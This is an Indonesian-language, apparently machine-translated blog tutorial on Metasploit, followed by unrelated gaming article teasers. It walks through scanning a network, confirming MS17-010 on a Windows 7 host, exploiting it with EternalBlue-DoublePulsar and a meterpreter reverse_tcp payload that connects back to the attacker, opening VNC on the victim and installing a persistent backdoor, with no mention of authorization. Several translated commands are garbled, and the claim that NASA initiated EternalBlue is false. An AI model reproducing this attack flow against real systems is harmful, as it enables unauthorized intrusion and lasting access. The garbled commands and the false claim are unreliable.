metasploit

Tutorial Metasploit

Tutorial Metasploit

Seperti yang telah kita bahas TOP 25 BEST KALI LINUX TOOL, dan kita menempatkan METASPLOIT di urutan pertama, sekarang mari kita bahas dan pelajari tentang METASPLOIT. Kami akan merekomendasikan Anda untuk terbiasa dengan Metasploit.

Metasploit awalnya dibuat oleh H. D Moore pada tahun 2003, hingga diakuisisi dan dikembangkan lebih lanjut oleh Rapid7 pada 21 Oktober 2009. Metasploit-framework sepenuhnya ditulis menggunakan Ruby, dan merupakan paket standar yang diinstal di sistem Kali Linux (dan juga hampir semua OS Pengujian Penetrasi, saya kira). Ini adalah kit favorit peretas atau penguji penetrasi untuk meneliti kerentanan keamanan, mengembangkan dan mengeksekusi eksploitasi pada target, dan pengembangan keamanan lainnya.

Metasploit hadir dengan beberapa edisi, umumnya dibagi menjadi dua kategori, versi gratis dan versi berbayar. Versi gratis: Metasploit Framework Community Edition (antarmuka berbasis CLI) dan Armitage (antarmuka berbasis GUI). Versi berbayar : Metasploit Express, Metasploit Pro, dan Cobalt Strike (mirip dengan Armitage, yang disediakan oleh Strategic Cyber ​​LLC).

Metasploit memungkinkan pengguna untuk membuat (atau mengembangkan) kode eksploit mereka sendiri, tetapi jangan khawatir jika Anda tidak tahu cara membuat kode, Metasploit memiliki begitu banyak modul dan mereka terus diperbarui. Saat ini Metasploit memiliki lebih dari 1600 eksploit dan 500 muatan. Cara sederhana untuk memahami apa itu eksploitasi dan muatan, eksploitasi pada dasarnya adalah bagaimana penyerang mengirimkan muatan, melalui lubang kerentanan sistem target.  Setelah penyerang meluncurkan exploit yang berisi payload terhadap target yang rentan, maka payload dikerahkan (payload digunakan untuk menghubungkan kembali ke penyerang untuk mendapatkan akses jarak jauh terhadap sistem target), pada tahap ini exploit dilakukan, dan menjadi tidak relevan.

“Metasploit bukan meretas alat instan, ini adalah kerangka kerja yang gila”

Artikel Metasploit ini adalah tentang melakukan pengujian penetrasi terhadap sistem target menggunakan alur berikut:


PERSIAPAN

Pastikan Kali Linux kami memiliki versi terbaru yang diperbarui. Akan ada peningkatan dalam setiap pembaruan. Jalankan perintah berikut:

~# pembaruan tepat
~# apt upgrade -y
~# apt dist-upgrade -y

Setelah mesin kita diperbarui, sekarang mari kita mulai dengan menjalankan konsol metasploit. Di terminal, ketik:

~# msfconsole

Dan juga Anda memerlukan editor teks apa pun, Gedit atau Leafpad, untuk mengumpulkan beberapa informasi di sepanjang jalan sebelum kami mengkompilasi serangan. Pertama, identifikasi Alamat IP Anda dari antarmuka nirkabel, IP router, dan netmask.

Berdasarkan informasi di atas kami mencatat alamat IP WLAN1 dan router, dan netmask. Jadi, catatannya akan terlihat seperti ini:

IP Penyerang (LHOST): 192.168.1.56
Gateway / IP Router: 192.168.1.1
Masker jaringan: 255.255.255.0(/24)


LANGKAH 1: PEMINDAIAN KERENTANAN

Di konsol metasploit, pertama-tama kami mengumpulkan informasi, seperti alamat IP target, Sistem Operasi, port yang dibuka, dan kerentanan. Metasploit memungkinkan kita untuk menjalankan NMap langsung dari konsol. Berdasarkan informasi di atas, jalankan perintah ini untuk menyelesaikan tugas pengumpulan informasi kami.

msf > nmap -v 192.168.1.1/24 --script vuln -Pn -O

Dari perintah di atas kami mendapat hasil di bawah ini.

Kami mendapat target rentan yang menjalankan Sistem Operasi Windows, dan yang rentan ada di layanan SMBv1. Jadi, tambahkan catatan.

IP Target (RHOST):  192.168.1.57
Kerentanan: Kerentanan Eksekusi Kode Jarak Jauh di server Microsoft SMBv1 (ms17-010)


LANGKAH 2: PENILAIAN KERENTANAN

Sekarang kita tahu target dan kerentanannya. Mari kita periksa kerentanan di konsol metasploit

Sekarang kita tahu target dan kerentanannya. Mari kita periksa kerentanan di konsol metasploit menggunakan modul tambahan smb_scanner. Jalankan perintah berikut:

msf > gunakan bantu/pemindai/smb/smb_ms17_010
bantu msf(smb_ms17_010) > setel RHOSTS [IP target]
bantu msf(smb_ms17_010) > jalankan

Metasploit yakin tentang kerentanannya, dan ini menunjukkan Edisi OS Windows yang tepat. Tambahkan ke catatan:

Target OS: Windows 7 Ultimate 7600


LANGKAH 3: MENGEKSPLOITASI

Sayangnya, metasploit tidak memiliki modul exploit yang terkait dengan kerentanan ini. Tapi, jangan khawatir, ada seorang pria di luar yang terbuka dan menulis kode eksploitnya. Eksploitasi itu akrab, karena diprakarsai oleh NASA, ini disebut EternalBlue-DoublePulsar. Anda dapat mengambilnya dari sini, atau Anda dapat mengikuti panduan dari video tutorial di bawah ini untuk menginstal kode eksploit ke kerangka metasploit Anda.

Setelah Anda mengikuti panduan di atas, (pastikan jalurnya sama dengan tutorial). Sekarang, Anda siap untuk mengeksploitasi target. Jalankan perintah berikut:

gunakan exploit/windows/smb/eternalblue_doublepulsar
setel jendela payload/meterpreter/reverse_tcp
atur PROCESSINJECT spoolsv.exe
atur RHOST 192.168.1.57
atur LHOST 192.168.1.56

Mengeksploitasi

Boom… Eksploitasi berhasil, kami mendapat sesi meterpreter. Seperti yang saya sebutkan sebelumnya, setelah eksploitasi diluncurkan, ia akan menyebarkan muatannya, yaitu, di sini kami menggunakan, windows/meterpreter/reverse_tcp.


LANGKAH 4: MENDAPATKAN AKSES JAUH

Mari kita jelajahi lebih banyak perintah yang tersedia, masukkan '?' (tanpa tanda tanya) dan lihat daftar perintah yang tersedia. Itu Stdapi, perintah sistem adalah:

Untuk melihat informasi lebih lanjut tentang sistem target, gunakan 'sysinfo' perintah. Outputnya akan terlihat seperti ini.

Karena kami menyuntikkan ke proses sistem sebelumnya (spoolsv.exe), kami mendapat Hak Istimewa Sistem. Kami memiliki target. Kita bisa berbuat banyak dengan perintah ke target. Misalnya kita bisa menjalankan RDP, atau hanya mengatur remote VNC. Untuk menjalankan layanan VNC masukkan perintah:

~# jalankan vnc

Hasilnya harus desktop mesin target, terlihat seperti ini.

Bagian terpenting adalah membuat backdoor, jadi setiap kali target terputus ke mesin kami, mesin target akan mencoba terhubung kembali, lagi ke kami. Backdooring digunakan untuk menjaga akses, itu seperti memancing, Anda tidak akan membuang ikan Anda kembali ke air setelah Anda mendapatkan ikan, kan? Anda ingin melakukan sesuatu dengan ikan, apakah menyimpannya di lemari es untuk tindakan lebih lanjut, seperti memasak atau menjualnya untuk mendapatkan uang.

Meterpreter memiliki fungsi backdooring terus-menerus ini. Jalankan perintah berikut, dan lihat parameter dan argumen yang tersedia.

meterpreter > jalankan ketekunan -h

Jika Anda tidak nyaman dengan skrip usang ini, modul ketekunan terbaru ada di bawah posting/windows/kelola/persistence_exe. Anda dapat menjelajahinya lebih jauh sendiri.

Metasploit sangat besar, ini bukan hanya alat, ini adalah kerangka kerja, anggap ia memiliki lebih dari 1600 eksploit dan sekitar 500 muatan. Satu artikel hanya cocok untuk gambaran besar dari penggunaan atau ide umum. Tapi, Anda telah belajar banyak dari artikel ini.

“Semakin Anda mengikuti aliran serangan, semakin Anda memiliki tantangan yang mudah.”

Aplikasi Pemetaan Gamepad Terbaik untuk Linux
Jika Anda suka bermain game di Linux dengan gamepad alih-alih sistem input keyboard dan mouse biasa, ada beberapa aplikasi yang berguna untuk Anda. Ba...
Alat Berguna untuk Gamer Linux
Jika Anda suka bermain game di Linux, kemungkinan besar Anda telah menggunakan aplikasi dan utilitas seperti Wine, Lutris, dan OBS Studio untuk mening...
Game Remaster HD untuk Linux yang Belum Pernah Rilis Linux Sebelumnya
Banyak pengembang dan penerbit game datang dengan remaster HD dari game lama untuk memperpanjang umur waralaba, harap penggemar meminta kompatibilitas...